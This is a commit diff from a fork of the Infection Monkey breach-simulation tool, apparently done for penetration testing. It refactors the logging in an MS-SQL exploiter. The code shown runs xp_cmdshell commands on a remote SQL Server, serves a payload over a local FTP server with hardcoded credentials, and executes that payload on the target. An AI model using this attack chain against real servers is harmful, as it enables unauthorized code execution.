p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

* Finalized the MS-SQL code 

* Changed the log to the right handle and added exceptions info.

* better docs and some pep 8
This commit is contained in:
maor.rayzin 2018-06-27 21:30:54 +03:00
parent 149525d205
commit b46810e02b
3 changed files with 16 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
infection_monkey/exploit/mssqlexec.py
View File

@ -1,5 +1,6 @@
from os import path from os import path
import logging import logging
import pymssql import pymssql
import mssqlexec_utils import mssqlexec_utils

24
infection_monkey/exploit/mssqlexec_utils.py
View File

@ -1,4 +1,3 @@
import os import os
import multiprocessing import multiprocessing
import logging import logging
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer from pyftpdlib.servers import FTPServer
__author__ = 'Maor Rayzin'
FTP_SERVER_PORT = 1026 FTP_SERVER_PORT = 1026
FTP_SERVER_ADDRESS = '' FTP_SERVER_ADDRESS = ''
FTP_SERVER_USER = 'brute' FTP_SERVER_USER = 'brute'
FTP_SERVER_PASSWORD = 'force' FTP_SERVER_PASSWORD = 'force'
FTP_WORKING_DIR = '.' FTP_WORKING_DIR = '.'
LOG = logging.getLogger(__name__)
class FTP: class FTP:
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
for cmd in shellcmds: for cmd in shellcmds:
self.cursor.execute(cmd) self.cursor.execute(cmd)
except Exception, e: except Exception, e:
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message)) LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
return True return True
else: else:
logging.error("Couldn't establish an FTP server for the dropout") LOG.error("Couldn't establish an FTP server for the dropout")
return False return False
def execute_payload(self): def execute_payload(self):
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
# Getting the payload's file name # Getting the payload's file name
payload_file_name = os.path.split(self.payload_path)[1] payload_file_name = os.path.split(self.payload_path)[1]
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error. # Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
shellcmd = """DECLARE @i INT \ shellcmd = """DECLARE @i INT \
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \ EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
SELECT @i """.format(payload_file_name) SELECT @i """.format(payload_file_name)
try: try:
# Executing payload on remote host # Executing payload on remote host
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name)) LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
self.cursor.execute(shellcmd) self.cursor.execute(shellcmd)
if self.cursor.fetchall()[0][0] == 0: if self.cursor.fetchall()[0][0] == 0:
# Success # Success
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name)) LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
return True return True
else: else:
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name)) LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
except pymssql.OperationalError: except pymssql.OperationalError:
logging.error('Executing payload: {0} failed'.format(payload_file_name)) LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
multiprocessing.log_to_stderr(logging.DEBUG) multiprocessing.log_to_stderr(logging.DEBUG)
p = multiprocessing.Process(target=ftp_s.run_server) p = multiprocessing.Process(target=ftp_s.run_server)
p.start() p.start()
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name)) LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
return ftp_s, p return ftp_s, p
except Exception, e: except Exception, e:
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message)) LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
return None, None return None, None
def __find_own_ip(self): def __find_own_ip(self):

1
infection_monkey/payloads/mssqlexec_payload.bat Normal file
View File

@ -0,0 +1 @@
dir c:\>c:\tmp\dir.txt